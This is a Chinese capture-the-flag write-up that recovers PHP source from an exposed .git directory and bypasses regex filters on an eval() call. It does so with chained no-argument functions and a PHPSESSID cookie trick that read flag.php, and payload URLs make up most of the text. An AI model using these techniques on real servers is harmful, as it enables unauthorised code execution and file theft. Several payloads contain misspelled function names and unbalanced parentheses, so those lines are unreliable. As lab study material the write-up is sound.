搜索读取文件的php函数的应用

搜索读取文件的php函数的应用

打开页面,尝试各种泄露的可能,用GitHack.py发现是.git文件泄露,因此构造

1
python GitHack.py http://url/.git/

获取源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

通过看到eval()这个危险函数,我们可以构造一些恶意代码来读取,但是它过滤掉了一些伪协议和一些函数,但是我们可以先构造一个exp,在本地尝试

1
2
3
4
<?php

print_r(scandir("."));
?>

来读取当前目录下的文件,如果“.”改为“\”,会读取系统下目录的文件,我们也可以使用localeconv()函数返回一包含本地数字及货币格式信息的数组,而构造

1
?exp=print_r(scandir(localeconv()));

可以看到第一个数组为“.”,因此,我们可以使用current()函数或pos()函数来默认读取返回数组中的当前单元,默认取第一个值。构造payload

1
?exp=print_r(scandir(current(localconv())));

发现里面有flag.php,此时我们可以使用array_reverse()函数来颠倒数组中元素的顺序,而后用next()读取数组中的第二个元素,构造payload

1
?exp=print_r(next(array_reverse(scandir(localconv()))));

而后我们可以用readfile()函数或hightlight_file()函数或show_source()函数来读取文件

1
?exp=show_source(next(array_reverse(scandir(localeconv()))));

当然也可以用array_file()来调换键和值的位置,然后用array_rand()读取键值,不断刷新不断随机返回

同时我们也可以使用PHPSESSID来解题,因为flag.php文件里的字符是由PHPSESSID来支持的,但是在使用session前要通过session_start()来告诉php我要使用session,因为php默认不主动使用session,而session_id()可以获取当前的session id

使用方法,我们要手动设置名为PHPSESSID的cookie,并设置值为flag.php,而后构造payload

1
?exp=print_r(session_id(session_start());

可返回flag.php

而后和上面一样,用readfile()函数或hightlight_file()函数或show_source()函数来读取文件,要手动设置名为PHPSESSID的cookie,并设置值为flag.php,而后构造payload

1
?exp=show_source(session_id(session_start());

读取flag.php的内容